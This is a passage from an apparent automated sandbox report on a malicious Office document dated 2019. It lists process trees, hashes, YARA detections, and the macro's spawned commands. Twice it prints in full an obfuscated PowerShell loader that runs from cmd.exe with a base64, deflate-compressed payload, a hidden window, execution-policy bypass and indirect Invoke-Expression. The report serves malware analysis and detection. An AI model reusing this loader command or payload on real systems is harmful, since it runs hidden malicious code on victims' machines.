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' ), [SySTEM.IO.comPREsSiOn.compreSSionMODE]::DEcoMpresS ) ^\| FOReach{neW-oBjecT IO.STreamreadEr($_, [SySTem.TExt.enCODINg]::aScIi) }^\|FOrEAch {$_.rEadToenD()} ) && poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )'
Imagebase:	0x4a330000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 4060 Parent PID: 3880

General

Start time:	14:45:26
Start date:	28/02/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Imagebase:	0x21db0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000002.1774152919.00260000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.1708252755.002A8000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.1705531360.00010000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 00000009.00000002.1781647232.04430000.00000004.sdmp, Author: unknown Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000002.1774181408.00287000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000002.1774965388.00530000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000002.1775563713.012C0000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 00000009.00000002.1774443824.00470000.00000008.sdmp, Author: unknown Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000000.1705388458.00010000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 00000009.00000002.1774008438.000D0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000009.00000002.1777041758.01AE0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000009.00000002.1781679900.04480000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000009.00000002.1774465519.004C0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000009.00000002.1780905680.03FA0000.00000002.sdmp, Author: unknown
Reputation:	high

Analysis Process: cmd.exe PID: 968 Parent PID: 2460

General

Start time:	14:45:27
Start date:	28/02/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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' ), [SySTEM.IO.comPREsSiOn.compreSSionMODE]::DEcoMpresS ) ^\| FOReach{neW-oBjecT IO.STreamreadEr($_, [SySTem.TExt.enCODINg]::aScIi) }^\|FOrEAch {$_.rEadToenD()} ) && poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )'
Imagebase:	0x4a330000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 1968 Parent PID: 968

General

Start time:	14:45:28
Start date:	28/02/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Imagebase:	0x21db0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000002.1774294244.00330000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000002.1774174716.00260000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000002.1781857851.045C0000.00000008.sdmp, Author: unknown Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000000.1713368455.00010000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000002.1780389444.03EA0000.00000008.sdmp, Author: unknown Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000002.1775135148.00620000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000002.1774225767.002D0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000003.1713665934.00010000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000002.1774035610.000D0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000002.1781520586.04430000.00000004.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000002.1776428355.01790000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 0000000C.00000002.1780569437.03F60000.00000002.sdmp, Author: unknown
Reputation:	high

Analysis Process: csc.exe PID: 4016 Parent PID: 1968

General

Start time:	14:45:34
Start date:	28/02/2019
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Imagebase:	0x400000
File size:	77960 bytes
MD5 hash:	0A1C81BDCB030222A0B0A652B2C89D8D
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 0000000D.00000002.1736577833.00330000.00000002.sdmp, Author: unknown
Reputation:	moderate

Analysis Process: csc.exe PID: 4020 Parent PID: 4060

General

Start time:	14:45:34
Start date:	28/02/2019
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'
Imagebase:	0x400000
File size:	77960 bytes
MD5 hash:	0A1C81BDCB030222A0B0A652B2C89D8D
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 0000000E.00000002.1736973475.00370000.00000002.sdmp, Author: unknown
Reputation:	moderate

Analysis Process: cvtres.exe PID: 2648 Parent PID: 4016

General

Start time:	14:45:35
Start date:	28/02/2019
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp'
Imagebase:	0x400000
File size:	32912 bytes
MD5 hash:	200FC355F85ECD4DB77FB3CAB2D01364
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cvtres.exe PID: 2552 Parent PID: 4020

General

Start time:	14:45:35
Start date:	28/02/2019
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp'
Imagebase:	0x400000
File size:	32912 bytes
MD5 hash:	200FC355F85ECD4DB77FB3CAB2D01364
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
